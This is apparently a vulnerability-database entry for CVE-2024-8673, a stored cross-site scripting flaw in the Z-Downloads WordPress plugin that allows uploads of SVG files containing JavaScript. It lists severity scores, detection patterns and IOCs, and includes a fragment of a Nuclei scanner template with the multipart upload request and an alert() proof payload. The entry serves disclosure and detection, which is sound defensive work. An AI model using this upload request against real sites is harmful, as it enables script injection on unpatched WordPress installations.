CVE-2024-8673
Published 2025-05-15
CVE-2024-8673: The Z-Downloads WordPress plugin before 1.11.7 does not properly validate uploaded files, allowing the upload of SVGs containing malicious JavaScript.
Priority P2 · 64 · critical · 9.1 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EXPLOIT
EPSS: 1.63% (73.3rd percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| urbanbase | z-downloads | < 1.11.7 | 1.11.7 |
Detection & IOCs (extracted from sources)
- path: /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss.svg
- url: /wp-admin/admin.php?page=z-downloads-files
- filename: xss.svg

Detection guidance:
- Detect SVG upload exploitation by matching HTTP 200 responses with Content-Type `image/svg+xml` containing the XSS payload `alert(document.domain);` served from the Z-Downloads upload path.
- Monitor for SVG files uploaded to the Z-Downloads plugin upload directory matching the pattern `/wp-content/uploads/z-downloads-<32hexchars>/files/<32hexchars>/xss.svg`.
- Watch for multipart form-data POST requests to the Z-Downloads file upload endpoint containing SVG payloads with embedded JavaScript (e.g., `alert(document.domain);`).
- The plugin fails to properly validate uploaded files, allowing SVGs containing malicious JavaScript to be stored and served; flag any SVG upload to the Z-Downloads plugin directory.

Notes:
- The nonce value in the upload request is dynamic and must be extracted from the page before the upload; a static replay of the request fails without a valid nonce.
- The upload directory name and file subdirectory both use 32-character hex strings, so the exact path is unpredictable; detection must use regex-based path matching rather than a static path.
No detection rules found.
Nuclei
Z-Downloads < 1.11.7 - Cross-Site Scripting (nuclei · CVSS 9.1)
CVE-2024-8673 [CRITICAL] Z-Downloads < 1.11.7 - Cross-Site Scripting

```yaml
        Z-Downloads
        alert(document.domain);
        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="submit"

        Upload
        -----------------------------191511049038951322013765412437--

      - |
        GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /{{payloadurl}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_5 == 200
          - contains(content_type_5, "image/svg+xml")
          - contains(body_5, "alert(document.domain);")
        condition: and

    extractors:
      - type: regex
        name: payloadurl
        part: body
        regex:
          - /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\.svg
        internal: true
# digest: 4b0a00483046022100
```
No writeups or analysis indexed.